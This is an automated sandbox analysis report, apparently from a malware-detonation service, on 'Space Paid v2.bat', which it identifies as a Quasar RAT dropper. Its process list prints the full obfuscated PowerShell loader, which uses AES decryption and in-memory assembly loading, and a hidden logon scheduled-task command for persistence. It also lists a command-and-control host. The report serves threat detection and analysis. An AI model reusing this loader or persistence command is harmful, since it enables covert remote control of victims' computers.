Analysis Overview
SHA256
ef70e618b652c777b3b2e589d1381bda6c7e49e7f2510334257c1e2add139045
Threat Level: Known bad
The file Space Paid v2.bat was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Looks up external IP address via web service
Drops file in System32 directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Runs ping.exe
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-11 20:23
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-11 20:23
Reported
2024-06-11 20:26
Platform
win10-20240404-en
Max time kernel
143s
Max time network
136s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Local\Temp\Space Paid v2.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_710_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/SKWGkqWfBPts6TUnMgnDqYmX8MpEwLAo3HUHFOUjzI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ghwm5EhH8tXaBpOVD1X+Rg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $jqCXf=New-Object System.IO.MemoryStream(,$param_var); $YXcdm=New-Object System.IO.MemoryStream; $PKGkZ=New-Object System.IO.Compression.GZipStream($jqCXf, [IO.Compression.CompressionMode]::Decompress); $PKGkZ.CopyTo($YXcdm); $PKGkZ.Dispose(); $jqCXf.Dispose(); $YXcdm.Dispose(); $YXcdm.ToArray();}function execute_function($param_var,$param2_var){ $lmNqD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $AayDY=$lmNqD.EntryPoint; $AayDY.Invoke($null, $param2_var);}$CnPhd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.bat';$host.UI.RawUI.WindowTitle = $CnPhd;$LgROZ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CnPhd).Split([Environment]::NewLine);foreach ($WnNUO in $LgROZ) { if ($WnNUO.StartsWith('wbcEgAsGQeSLuSguymAP')) { $gtIWp=$WnNUO.Substring(20); break; }}$payloads_var=[string[]]$gtIWp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nuwUg4MuldyS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-63294.portmap.host | udp |
| DE | 193.161.193.99:63294 | runderscore00-63294.portmap.host | tcp |
| US | 8.8.8.8:53 | 99.193.161.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
memory/2156-2-0x00007FFE5C983000-0x00007FFE5C984000-memory.dmp
memory/2156-5-0x0000020BA84A0000-0x0000020BA84C2000-memory.dmp
memory/2156-9-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n5eckjxr.egl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2156-21-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/2156-36-0x0000020BA8650000-0x0000020BA868C000-memory.dmp
memory/2156-47-0x0000020BA8AA0000-0x0000020BA8B16000-memory.dmp
memory/2156-56-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/2156-57-0x0000020BA8690000-0x0000020BA8698000-memory.dmp
memory/2156-58-0x0000020BA8A20000-0x0000020BA8A90000-memory.dmp
memory/3632-70-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/3632-73-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/3632-74-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
memory/3632-104-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.vbs
| MD5 | bef1d6774712f648f12f43eb50654e52 |
| SHA1 | 8b267bd0b2f617a000fd2ab8ff2346e7a3ab5e84 |
| SHA256 | bb2ebe3e6f8211e382cb089ecb688d07030588cb9b040b4f809837b66b7759e2 |
| SHA512 | 22c1d654685387f2a3297517749f2e5a28204a029477d1a566878e5b38bcc8162e10795df97d1731f29a13ff7a3fdbc876b4e5c56f048e4fe720ec6699550c11 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_710.bat
| MD5 | a5c3bef843c9d6022db92547f32855d1 |
| SHA1 | 816338da7ee45d496f39bbd36c6b106ee0b3e2fe |
| SHA256 | ef70e618b652c777b3b2e589d1381bda6c7e49e7f2510334257c1e2add139045 |
| SHA512 | 0e44e31275a89f29388418538f57cb3437ad1d24f08d0c3c7d85a1a906c5b212024f2960237b66e3f2838923497e82f198ad8c4ed0b34548190e6db03504f1bd |
memory/2156-117-0x00007FFE5C980000-0x00007FFE5D36C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | aeb24b5729d62e81a27174f46d431126 |
| SHA1 | baa02ac3f99822d1915bac666450dc20727494bb |
| SHA256 | d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471 |
| SHA512 | e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415 |
memory/2876-171-0x0000000002300000-0x000000000232A000-memory.dmp
memory/2876-206-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1320-217-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1228-226-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1648-232-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/2716-233-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1384-234-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/916-236-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1412-235-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/828-227-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/876-231-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/4800-223-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1908-230-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/2700-221-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/4300-220-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1208-229-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/760-228-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1772-219-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1564-218-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1072-225-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1464-224-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/1528-222-0x00007FFE3A3A0000-0x00007FFE3A3B0000-memory.dmp
memory/4176-259-0x000002975D7A0000-0x000002975D7FE000-memory.dmp
memory/4176-260-0x000002975D4F0000-0x000002975D502000-memory.dmp
memory/4176-261-0x000002975DC40000-0x000002975DC7E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nuwUg4MuldyS.bat
| MD5 | 513249d6162178b1543d22794fd3101e |
| SHA1 | 2328040e93a4e71a0affce11d2820680232b55ab |
| SHA256 | 8d8cfceb69c6bce3c8a1fc936ac244fa867a7eb47448ddf02ab0695120d44781 |
| SHA512 | 28d9560803135500bbd658667e250b72dda908a7dcb9b88bc4e3cf461e27b2e795df5a9e328b0d17636d54a5c2b01f9b7abad47a1e26b111dd30b9d7776e4a49 |
C:\Users\Admin\AppData\Roaming\$sxr-Logs\06-11-~1
| MD5 | f6f99975c159f259c3cbb9864c582537 |
| SHA1 | 8336179843c4f0c1e1e56cc1ebf9dd8679906e65 |
| SHA256 | 5035b7e4e0fbc2d784da22f499af927cbb381948c07f072f014926ba551b9bb6 |
| SHA512 | 6a084c4698931220447448823973aa65d9ab3e896f245130fa2e36f3ffe944223a099231b02d1edb6f8b6765c7a0b92890c1dad641a7684d6554465e34c4a4d5 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 20:23
Reported
2024-06-11 20:26
Platform
win10v2004-20240611-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-11-20-23-49.etl | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-11-20-23-49.etl | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" | C:\Windows\system32\svchost.exe | N/A |
